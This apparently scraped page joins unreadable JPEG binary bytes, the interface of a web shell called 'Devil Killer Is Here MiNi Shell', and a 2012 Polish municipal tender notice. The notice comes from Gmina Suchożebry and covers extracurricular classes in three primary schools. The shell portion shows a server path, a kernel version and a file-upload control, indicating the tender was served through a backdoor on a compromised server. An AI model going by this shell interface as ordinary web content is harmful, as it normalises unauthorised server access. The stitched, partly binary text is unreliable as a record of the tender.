JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120808/171943-N-2012.html

<p class="kh_header"><b>Suchożebry: Przeprowadzenie zajęć rozwijających zainteresowania i uzdolnienia uczniów w ramach projektu Doświadczam, przeżywam, poznaję</b><br>
<b>Numer ogłoszenia: 171943 - 2012; data zamieszczenia: 08.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Suchożebry , ul. Aleksandry Ogińskiej 11, 08-125 Suchożebry, woj. mazowieckie, tel. 0-25 63 145 15, faks 0-25 63 145 15.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć rozwijających zainteresowania i uzdolnienia uczniów w ramach projektu Doświadczam, przeżywam, poznaję.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem postępowania jest usługa pn: Przeprowadzenie zajęć rozwijających zainteresowania i uzdolnienia uczniów w ramach projektu Doświadczam, przeżywam, poznaję,  w tym:

Część I - Realizacja zajęć koła matematycznego w Szkole Podstawowej w Krynicy. 

Część II - Realizacja zajęć koła matematycznego w Szkole Podstawowej w Krześlinie.

Część III - Realizacja zajęć koła matematycznego w Szkole Podstawowej w Suchożebrach. 

Część IV - Realizacja zajęć koła polonistycznego w Szkole Podstawowej w Krynicy.

Część V - Realizacja zajęć koła polonistycznego w Szkole Podstawowej w Krześlinie.
Część VI - Realizacja zajęć koła polonistycznego w Szkole Podstawowej w Suchożebrach. 
Część VII - Realizacja zajęć koła informatycznego w Szkole Podstawowej w Krynicy.
Część VIII - Realizacja zajęć koła informatycznego w Szkole Podstawowej w Krześlinie. Zajęcia 
Część IX - Realizacja zajęć koła informatycznego w Szkole Podstawowej w Suchożebrach. 
Część X - Realizacja zajęć koła informatycznego w Szkole Podstawowej w Suchożebrach. 

Część XI - Realizacja zajęć koła języka angielskiego w Szkole Podstawowej w Krynicy.

Część XII - Realizacja zajęć koła języka angielskiego w Szkole Podstawowej w Krześlinie
  
Część XIII - Realizacja zajęć koła języka angielskiego w Szkole Podstawowej w Suchożebrach.

Część XIV - Realizacja zajęć koła sportowego w Szkole Podstawowej w Krynicy.

Część XV - Realizacja zajęć koła sportowego w Szkole Podstawowej w Krześlinie

Część XVI - Realizacja zajęć koła sportowego w Szkole Podstawowej w Suchożebrach. 

Część XVII - Realizacja zajęć koła sportowego w Szkole Podstawowej w Suchożebrach. 

3.2. Zajęcia będą odbywać się w trzech szkołach: w Krynicy, w Krześlinie i w Suchożebrach w okresie od 01.09.2012r. do 31.12.2013r.
3.2.1.W Szkole Podstawowej w Krynicy, wszystkie zadania tj. część I, IV, VII, XI, XIV w okresie od 01.09.2012r. do 31.12.2013 zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. 
3.2.2.W Szkole Podstawowej w Krześlinie wszystkie zadania tj. część II, V, VIII, XII, XV w okresie od 01.01.2013 do 31.12.2013r. zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. 
3.2.3. W Szkole Podstawowej w Suchożebrach wszystkie zadania tj. część III, VI, IX, X, XIII, XVI, XVII  w okresie od 01.09.2012r. do 31.12.2013 zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. 

3.3. Wykonawca ponosi pełną odpowiedzialność za uczniów w czasie trwania zajęć. Następujące zadania będą odbywać się w tym samym czasie: część VII-X i XIV-XVII. W przypadku pozostałych zadań istnieje możliwość, że niektóre z nich będą  realizowane w tym samym czasie, w związku z czym do realizacji każdego zadania powinna być wskazana inna osoba. Jedna do każdego zadania. Wykonawcy będą zobowiązani bezwzględnie dostosować się do ustalonego przez dyrektorów poszczególnych szkół tygodniowych rozkładów zajęć.

3.4. 1. Do obowiązków Wykonawcy należy:
1) świadczenie usługi objętej niniejszym zamówieniem; 
2) opracowanie programu autorskiego, (program  winien zawierać: cel ogólny i cele szczegółowe zajęć, formy realizacji, sposoby realizacji celów, oczekiwane efekty, sposób ewaluacji efektów, tematy kolejnych zajęć, wykorzystane środki dydaktyczne) oraz przedłożenie go koordynatorowi szkolnemu nie później niż 3 dni przed rozpoczęciem zajęć. Program powinien być dostosowany  do poziomu rozwoju uczniów, powinien uwzględniać podstawę programową realizowanego przedmiotu lub cyklu kształcenia. 
3) maksymalne i efektywne wykorzystanie czasu przeznaczonego na realizację zajęć
4)współpraca ze szkolnym koordynatorem projektu przy opracowywaniu szczegółowego harmonogramu prowadzenia zajęć;
5) uzgadnianie z koordynatorem szkolnym wszelkich  zmian harmonogramu wynikających z zaistnienia ważnych powodów;
6) prowadzenie dokumentacji związanej z realizacją zajęć (tj. wypełnianie dziennika zajęć, miesięcznych kart czasu pracy do 3-go dnia następnego miesiąca, sporządzanie w okresach rozliczeniowych (zgodnie z harmonogramem sporządzanych wniosków o płatność) sprawozdania w wersji papierowej i elektronicznej i dostarczanie do  szkolnego koordynatora projektu;
7) bezwzględne dostosowanie się do ustalonego przez dyrektorów szkół planów zajęć lekcyjnych; 
8) wykorzystywanie w realizacji zajęć aktywizujących metod nauczania, motywujących uczniów do czynnego udziału w zajęciach; 
9) opieka nad uczniami od momentu odebrania ich od przewoźnika do czasu rozpoczęcia zajęć, opieka nad nimi w trakcie obiadu oraz odprowadzenie uczniów do środka transportu po zajęciach - dotyczy części VII-X oraz części XIV-XVII
10) gromadzenie wytworów prac uczestników zajęć
11) należyta troska o powierzony sprzęt i pomoce dydaktyczne
12) uczestnictwo i pomoc w organizacji podsumowania zajęć.
13) wykonywanie innych poleceń szkolnego koordynatora projektu związanych z realizacją zadania.
14) opieka nad uczniami w czasie wyjazdów do kina, teatru i muzeum (tu można dopisac ile na 1 wykonawcę będzie takich wyjazdów). Przewiduje się maksymalnie dwukrotne sprawowanie opieki nad uczniami w czasie wyjazdów do kina, teatru i muzeum przez  wykonawcę każdej części ujętej w SIWZ.
3.4.2. Wykonawca ponosi pełną odpowiedzialność za uczniów w czasie trwania zajęć
3.4.3. Wykonawca zobowiązuje się do wykonania przedmiotu umowy z należytą starannością zgodnie z obowiązującymi przepisami, normami, na ustalonych niniejszą umową warunkach oraz stosownie do wymagań wynikających ze współfinansowania projektu ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013r.
3.4.4. Wykonawca po zakończeniu realizacji zadania  skompletuje dokumentację i przekaże ją właściwemu szkolnemu koordynatorowi projektu.
3.5. Wykonawca może złożyć ofertę na dowolną ilość zadań. 
3.6. Wykonawca powinien posiadać odpowiednie kwalifikacje do prowadzenia zajęć: 
- zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009r. nr 50, poz. 400) lub
- zgodnych z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394).
3.7. W przypadku wystąpienia sprzeczności w dokumentach tworzących SIWZ, wiążącą decyzję w tych sprawach podejmuje Zamawiający..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>. Oferta Wykonawcy będzie zawierać: a) wypełniony formularz ofertowy (zał. 1), b) dokumenty i oświadczenia wymienione w pkt. VII niniejszej Specyfikacji. c) zaparafowany przez Wykonawcę egzemplarz Załącznika nr 4a lub/i do Załącznika nr 4b SIWZ pn. Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego- stosownie do zadania/ zadań na które Wykonawca składa ofertę. d) pełnomocnictwo do reprezentowania konsorcjum w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, (jeśli dotyczy); e) Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony. Pełnomocnictwo musi być przedstawione w formie oryginału, poświadczonej notarialnie za zgodność z oryginałem kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu, lub kopii poświadczonej za zgodność z oryginałem przez mocodawcę f) Pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo do reprezentowania Wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - dotyczy tylko Wykonawców wspólnie ubiegających się o uzyskanie zamówienia. Pełnomocnictwo musi być przedstawione w formie oryginału, poświadczonej notarialnie za zgodność z oryginałem kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu, lub kopii poświadczonej za zgodność z oryginałem przez mocodawcę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający z zastrzeżeniem p. 2. dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach: a) w uzasadnionych przypadkach lub innych okolicznościach niezależnych od Zamawiającego lub Wykonawcy konieczna będzie zmiana terminu realizacji zamówienia, Zamawiający na wniosek Wykonawcy może przedłużyć termin realizacji zamówienia. Okolicznościami takimi będą: niesprzyjające warunki atmosferyczne, siła wyższa, awarie, katastrofy, akty wandalizmu, b) w innych uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, c) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, a zmiany wynikły w trakcie realizacji zamówienia, Zamawiający dopuszcza przedłużenie terminu wykonania przedmiotu umowy w następujących przypadkach: - zawieszenie wykonywania usług przez Zamawiającego d) zmiany postanowień umowy następuje w formie pisemnej pod rygorem nieważności. 2. Zmiany dotyczące wydłużenia terminu realizacji zamówienia (wykonania umowy), będą możliwe jedynie w przypadku gdy Zamawiający uzyska zgodę Instytucji Wdrażającej Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 na wydłużenie terminu realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.suchozebry.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Suchożebry ul. A. Ogińskiej 11, 08-125 Suchożebry Cena 30,00zł + koszt przesyłki za pobraniem (jeśli dotyczy)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2012 godzina 11:00, miejsce: Urząd Gminy Suchożebry ul. A. Ogińskiej 11, 08-125 Suchożebry Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013r Priorytet. IX. Rozwój wykształcenia i kompetencji w regionach, działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Realizacja zajęć koła matematycznego w Szkole Podstawowej w Krynicy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie,  w wymiarze od 1 do 2 godzin w miesiącu, przeciętnie 1 godzina co drugi tydzień, od poniedziałku do piątku, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 25 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Realizacja zajęć koła matematycznego w Szkole Podstawowej w Krześlinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, w wymiarze 2 godziny w miesiącu, przeciętnie 1 godzina co drugi tydzień,  od poniedziałku do piątku, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 20 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - Realizacja zajęć koła matematycznego w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, w wymiarze od 2 do 4 godzin w miesiącu, przeciętnie 1 godzina w  tygodniu,  od poniedziałku do piątku, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 50 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV - Realizacja zajęć koła polonistycznego w Szkole Podstawowej w Krynicy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, w wymiarze od 1 do 2 godzin w miesiącu, przeciętnie 1 godzina co drugi tydzień, od poniedziałku do piątku,  zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 25 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V - Realizacja zajęć koła polonistycznego w Szkole Podstawowej w Krześlinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, w wymiarze 2 godziny w miesiącu, przeciętnie 1 godzina co drugi tydzień, od poniedziałku do piątku,  zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 20 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI - Realizacja zajęć koła polonistycznego w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, w wymiarze od 2 do 4 godzin w miesiącu, przeciętnie 1 godzina w  tygodniu, od poniedziałku do piątku,  zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 50 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII - Realizacja zajęć koła informatycznego w Szkole Podstawowej w Krynicy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, raz w miesiącu, w sobotę przez 2 godziny, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 28 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
